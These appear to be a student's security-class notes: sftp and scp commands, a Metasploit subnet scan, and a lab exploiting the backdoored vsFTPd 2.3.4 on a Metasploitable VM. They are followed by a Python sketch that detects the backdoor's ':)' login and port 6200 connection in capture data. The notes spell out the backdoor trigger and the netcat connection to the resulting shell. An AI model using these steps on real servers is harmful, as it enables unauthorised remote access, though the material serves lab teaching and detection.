Notes: 10/17/19

sudo vulnerability

ftp/sftp
    sftp> ls
    sftp> !ls
    sftp> cd public_html/
    sftp> ls
    sftp> lcd public_html
    sftp> !pwd
    sftp> get test.html
    sftp> bye

Secure Copy
    scp
    scp://user@host:port/path -OR- host:path
    scp ftp.gettysburg.edu:~/public_html/test.html .

Metasploit:
    //scan subnet
    db_nmap -A 192.168.56.0/24
    services

https://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html

Kali: run wireshark and capture the communication from the exploit

Workstation:
- use ftp to connect to metasploitable
    cs17:~$ ftp 192.168.56.7
    Connected to 192.168.56.7.
    220 (vsFTPd 2.3.4)
    Name (192.168.56.7:cpresser): kcV:)
    331 Please specify the password.
    Password:
- use nc to connect to the backdoor shell it creates
    cs17:~$ nc 192.168.56.7 6200
    ls
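
Detection sketch for the Wireshark capture step (an added example, not part of the original notes): the session above logs in with a name ending in ":)" and then connects to port 6200, so a capture can be checked for that pair of events. The Event tuple, the detect function, the 60-second window and every address except 192.168.56.7 are assumptions, and the events are constructed sample data.

```python
import re
from typing import NamedTuple

BACKDOOR_PORT = 6200  # port the notes connect to with nc
# FTP control-channel USER command; group 1 is the login name.
USER_RE = re.compile(rb"^USER\s+(.*?)\r?\n", re.IGNORECASE | re.MULTILINE)

class Event(NamedTuple):      # hypothetical record exported from a capture
    ts: float                 # seconds since start of capture
    src: str
    dst: str
    dport: int
    payload: bytes            # b"" for a bare connection attempt

def detect(events, window=60.0):
    """Flag ':)' login names on port 21 and later connects to port 6200."""
    alerts = []
    triggered = {}            # server address -> time of last ':)' login
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.dport == 21:
            for m in USER_RE.finditer(ev.payload):
                if b":)" in m.group(1):
                    triggered[ev.dst] = ev.ts
                    name = m.group(1).decode("latin-1")
                    alerts.append(("smiley-user", ev.src, ev.dst, name))
        elif ev.dport == BACKDOOR_PORT:
            t0 = triggered.get(ev.dst)
            linked = t0 is not None and ev.ts - t0 <= window
            kind = "backdoor-connect" if linked else "port-6200-connect"
            alerts.append((kind, ev.src, ev.dst, str(ev.dport)))
    return alerts

# Constructed sample: one normal login, the session from the notes,
# and an unrelated connection to port 6200 on another host.
SAMPLE = [
    Event(0.0, "192.168.56.20", "192.168.56.7", 21, b"USER alice\r\n"),
    Event(1.0, "192.168.56.20", "192.168.56.7", 21, b"PASS secret\r\n"),
    Event(5.0, "192.168.56.30", "192.168.56.7", 21, b"USER kcV:)\r\n"),
    Event(5.5, "192.168.56.30", "192.168.56.7", 21, b"PASS x\r\n"),
    Event(6.0, "192.168.56.30", "192.168.56.7", 6200, b""),
    Event(500.0, "192.168.56.40", "192.168.56.8", 6200, b""),
]

if __name__ == "__main__":
    for alert in detect(SAMPLE):
        print(alert)
```

A "backdoor-connect" alert means the port 6200 connection followed a ":)" login to the same server within the window; "port-6200-connect" is the weaker signal on its own.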